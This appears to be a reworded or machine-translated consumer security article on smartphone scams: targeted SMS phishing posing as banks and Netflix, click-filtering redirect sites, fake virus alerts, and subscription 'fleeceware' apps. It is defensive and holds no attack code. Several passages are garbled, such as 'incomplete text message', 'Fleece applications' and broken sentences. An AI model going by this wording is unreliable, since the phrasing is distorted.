By some estimates, there are more smartphones on this planet than humans to use them. People who have never used a desktop computer use smartphones and other mobile devices every day and have much of their life tied to them, perhaps more than they should.
As a result, cyber scammers have shifted their approach from emailing gullible personal computer users (pretending to be Nigerian princes in need of bank assistance) and instead have set their sights on the easier target of mobile phone users. Criminals are using smartphone apps and texting to lure vulnerable people into cheating, some with purely financial consequences and others that put victims in actual physical danger.
I recently outlined some ways to apply a bit of armor to our digital lives, but recent trends in online scams have underscored how easily smartphones and their apps can turn against their users. These worst-case scenarios are worth reviewing to help others spot and avoid them, and we’re not just talking about helping older users with this. This affects everyone.
Personally, I have been contacted by a variety of people who have been victims of mobile-centric scams and people who have been exposed and attacked through unexpected vulnerabilities created by interactions with mobile applications. For some, these experiences have shattered their sense of privacy and security, and for others, these scams have cost thousands (or tens of thousands) of dollars. In light of this, it pays to arm yourself and your family with information and a lot of skepticism.
Targeted SMS Phishing
In the past two years there has been a huge increase in text message phishing scams that target personal data, especially website credentials and credit card details. Sometimes called “smishing”, SMS phishing messages often carry a call to action that motivates the recipient to click on a link, a link that often leads to a web page intended to steal usernames and passwords ( or do something worse). These unwanted text messages are nothing new, but they are becoming more and more specific.
In 2020, FTC reported that American consumers lost $ 86 million as a result of fraudulent text messages, and the FCC even issued a warning about COVID-19 text scams. Sure, sure, you are smart and you would never give up your personal details to an incomplete text message. But what if the text mentions your name, along with enough correct information to worry you in the least? Like a text message supposedly from your bank, giving your name, asking you to log in to confirm or dispute a $ 500 charge on your credit card at Walmart?
That is the type of message I received recently. If I had not read the message carefully or noticed that it came from a fake phone number that was not connected to my bank or did not remember that I had never consented to any communication with my bank through text messages, I could have clicked.
Instead, I went into my bank’s mobile app and found a notice on the login page that customers were experiencing fraud attempts via text messages. I took the link to my computer and downloaded the page using wget. The link pointed to a Google App Engine page that contained a link in an IFRAME element to a Russian website, one that was trying to emulate the bank’s website login.
SMS scams like these are made easy by the large amount of public data exposure and aggregation of personal data by marketers. All too often this type of data is collected in databases that are leaked or hacked. Scammers can target a large number of customers of a specific brand simply by connecting their relationship with a company with their phone numbers. I don’t have good scientific data on the prevalence of targeted smishing, but a random sample of family and friends indicates that it is not a temporary problem: in some cases it accounts for half of the daily SMS messages they receive.
Most of it is the equivalent of pop-up web ads. Some of the targeted SMS messages that I have seen allegedly come from common services, like Netflix, for example:
Netflix: [Name], update your membership with us to keep watching. [very sketchy URL]
The incomplete link led to a site that claimed my last payment had been declined and I had 48 hours to reactivate my account.
By clicking on that link you are directed to a series of page forwards powered by a “crawler” site configured to filter out suspicious clicks (such as those from PC browsers), sending only mobile browsers to the intended destination, in in this case, a Netflix skin. similar service trying to get you to sign up as a member. Your IP address is one of the arguments passed to the final URL to avoid undesirable ranges of “clients”.
This is a light scam, no doubt. But the same tracker sites are used by a wide range of scams, including pop-up “fake alerts” scams by SMS and mobile browsers. These types of scams often include an urgent call to action. Another frequent angle is stating that the recipient’s IP address is “being tracked due to viruses”, with a link leading to an app store page, usually some kind of questionable virtual private network app that actually can’t do. nothing more than collecting “in-app payments” through the Apple or Google app stores for a non-working service. Or the service does it it works, but not in the way the device owner would like.
Fleece applications and fake applications
Despite the efforts of large companies to check the security of applications before they are offered for download in the app stores, scam developers still manage to introduce nasty things to the iOS and Android markets: very cheap or “free” limited (or nonexistent). utility that tricks users into paying large amounts of money.
These apps are often presented as free, but come with in-app payments, including subscription fees that kick in automatically after a very short “trial period” that may not be completely transparent to the user. Often referred to as “fleece, “Applications like this can charge what the developer wants repeatedly. And they can even continue to incur charges after a user has uninstalled the application.
From time to time, malicious apps manage to bypass app store control. When detected, the developer accounts associated with the applications are generally suspended and the applications are removed from stores and (usually) from the devices on which they have been installed. But the developers of these apps often just switch to another developer account or use other ways to show their apps to users.
I followed a campaign of pop-up ads that led smartphone users to “safe” apps in both app stores, using bogus alert pages that resemble mobile operating system alerts that warn of virus infections on apps. devices. When the ads detected an iOS device, they ended up opening the page for a VPN app from a developer in Belarus that charged $ 10 a week for the service. The app store list was crammed with 4-star reviews (probably fake), along with some from real customers who discovered they had been scammed.
The app itself worked, more or less: it directed all users’ internet traffic through a server in Belarus, allowing man-in-the-middle attacks and the collection of huge amounts of user data.
Sure, a sophisticated device user would know that these apps are fraudulent and detect them immediately, right? Possibly, but how many iOS and Android users have that level of sophistication?